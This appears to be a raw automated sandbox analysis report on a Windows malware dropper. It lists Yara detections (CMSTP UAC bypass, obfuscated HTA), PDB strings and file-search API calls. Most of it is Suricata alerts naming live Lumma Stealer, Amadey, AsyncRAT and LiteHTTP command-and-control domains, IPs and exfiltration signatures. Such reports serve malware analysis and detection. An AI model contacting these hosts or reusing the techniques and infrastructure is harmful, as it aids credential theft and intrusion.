                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackString decryptor: GP97vNLr0Wa9AfljI/phz7VBswKUASqgiIZZNodWNIPzI+56yXWuOpvWNTQgDoUgAOskV2wmjD76A2aVNhUQyD92KSnqDXlLV+P47rGl14aHUzYeuCKUXHJvFlkQk8GfPZNKaXZNiDGmKibSepgjoJIIM3/Vc+3s07D2Dmv8Bo2hYGsNeAEVOq3oF0fCL5kPxaUCQE+9cR0dxZoIfy5DlW14E6ZSTfnUegUZ8g8ADtxIu5h+2fL58CwzpUlLdw8kRHvK2JPYQSAXV3IiMTw58KlB34+Nw51yoc05UAGmWcMJPRuU2+p/l1cNkzDepbf1evSE6bARyi/iao6lMUMD6paEM4DxEFckeqpVjs3BIx6A1EcYTcx8NepXiEhp/eqoqoCjHS/jwuMPB8KLFpBK7upxBrI6YtoB+sFqHq9bo62za97eZbIE5lxlsp88UEhUa6rAgiH9QNyqb+pfOX7MpaYBYpFDqizolVMqtQC20H8E6szaut4gjCIOUqUHhBSgFtWjJGR1F6x4RUn8llIW1Bvn6uRNFur5U9N5XYZxRThgmv05Cr+Qb09v+D95XyOJqvUSTWKXzmr1tMNRcNEyT3g74VybkYdRldrU1n3+MmLM7RsivXydzIm4+qzkyH58CXkq8767vS6MX3HvkK+WsPnITsc0iub7sUPhNwTofv8=
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackString decryptor: false
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackString decryptor: null
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackString decryptor: false
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpackString decryptor: Default

                                Exploits

                                barindex
                                Yara detected UAC Bypass using CMSTP
                                Source: Yara matchFile source: 50.2.c7f37422c5.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.935372fb1f.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000010.00000002.22377836357.0000000000413000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.22773040664.0000000000413000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY

                                Phishing

                                barindex
                                Yara detected obfuscated html page
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, type: DROPPED
                                Source: QkRFz2sau5.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49759 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49761 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49763 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49764 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49765 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49768 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49769 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.150.254:443 -> 192.168.11.20:49771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49775 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49777 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49779 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49782 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49783 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49784 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49785 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49787 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49789 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49790 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49792 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49793 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49794 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.47.135:443 -> 192.168.11.20:49795 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49797 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.181.243:443 -> 192.168.11.20:49799 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.204.173.220:443 -> 192.168.11.20:49809 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49816 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49818 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49821 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49822 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49823 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49824 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49826 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.11.20:49828 version: TLS 1.2
                                Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 935372fb1f.exe, 00000010.00000002.22377836357.0000000000410000.00000040.00000001.01000000.00000013.sdmp, 935372fb1f.exe, 00000010.00000003.22357417975.0000000004A0F000.00000004.00001000.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22773040664.0000000000410000.00000040.00000001.01000000.0000001E.sdmp, c7f37422c5.exe, 00000032.00000003.22752671703.00000000049FF000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 935372fb1f.exe, 00000010.00000002.22379704767.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22775648056.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Bedroom.pdbH^ source: f891ed3167.exe, 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, f891ed3167.exe, 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22383262104.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22782201415.00000000052C9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: BitLockerToGo.pdb source: 33c3d7c7bd.exe, 00000023.00000002.22885525568.000000000A280000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.8\Bot\LiteHTTP\obj\x86\Debug\SystemHelper.pdb source: skotes.exe, 0000000E.00000002.23301841769.000000000107B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 935372fb1f.exe, 00000010.00000002.22379704767.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22775648056.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22383262104.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22782201415.00000000052C9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: BitLockerToGo.pdbGCTL source: 33c3d7c7bd.exe, 00000023.00000002.22885525568.000000000A280000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: em.pdb source: powershell.exe, 00000009.00000002.22110805513.000001D3449AF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Bedroom.pdb source: f891ed3167.exe, 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, f891ed3167.exe, 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: .pdbTw source: powershell.exe, 00000009.00000002.22110805513.000001D3449AF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Battery.pdb source: f8e8a2d2f0.exe, 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, f8e8a2d2f0.exe, 0000002A.00000000.22619514498.0000000000DD2000.00000002.00000001.01000000.0000001C.sdmp
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_009CDBBE
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0099C2A2 FindFirstFileExW,0_2_0099C2A2
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D68EE FindFirstFileW,FindClose,0_2_009D68EE
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_009D698F
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009CD076
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009CD3A9
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D9642
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D979D
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_009D9B2B
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_009D5C97
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\764661\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\764661
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.11.20:49756 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49760 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49759 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49761 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.11.20:63898 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.11.20:49757
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49764 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49768 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49766 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49765 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49771 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49770 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49763 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.11.20:49769 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49773 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059985 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cozyhomevpibes .cyou) : 192.168.11.20:63210 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49775 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49777 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49779 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49778 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49782 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2059925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz) : 192.168.11.20:55092 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49785 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49787 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49788 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49790 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49792 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49793 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49794 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49795 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49796 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49799 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2059919 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (importenptoc .com) : 192.168.11.20:52656 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49789 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49800 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059920 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (importenptoc .com in TLS SNI) : 192.168.11.20:49783 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49784 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.11.20:49802
                                Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 159.100.19.137:7707 -> 192.168.11.20:49802
                                Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 87.120.113.214:4449 -> 192.168.11.20:49808
                                Source: Network trafficSuricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.11.20:49625 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059771 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.11.20:49625 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059427 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (suggestyuoz .biz) : 192.168.11.20:51600 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059435 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (affordtempyo .biz) : 192.168.11.20:60682 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49803 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059425 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lightdeerysua .biz) : 192.168.11.20:54853 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.11.20:52190 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059433 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pleasedcfrown .biz) : 192.168.11.20:60518 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059429 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hoursuhouy .biz) : 192.168.11.20:54703 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 159.100.19.137:7707 -> 192.168.11.20:49811
                                Source: Network trafficSuricata IDS: 2059431 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mixedrecipew .biz) : 192.168.11.20:52041 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49814 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059907 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (actiothreaz .com) : 192.168.11.20:49952 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49816 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49822 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49821 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 93.88.203.169:56001 -> 192.168.11.20:49820
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49823 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49826 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49828 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49825 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49831 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 87.120.113.214:4449 -> 192.168.11.20:49834
                                Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.11.20:49837 -> 41.216.188.198:80
                                Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.11.20:49837 -> 41.216.188.198:80
                                Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.11.20:49837 -> 41.216.188.198:80
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49829 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.11.20:49797 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.11.20:49812 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49818 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.11.20:49817 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2059908 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (actiothreaz .com in TLS SNI) : 192.168.11.20:49824 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2031198 - Severity 1 - ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil : 192.168.11.20:49832 -> 109.94.208.20:5972
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49759 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49761 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49759 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49761 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49768 -> 172.67.150.254:443
                                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49787 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49787 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49782 -> 104.21.47.135:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49784 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49784 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49797 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49818 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49818 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49821 -> 104.21.112.1:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49799 -> 172.67.181.243:443
                                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.11.20:49809 -> 23.204.173.220:443
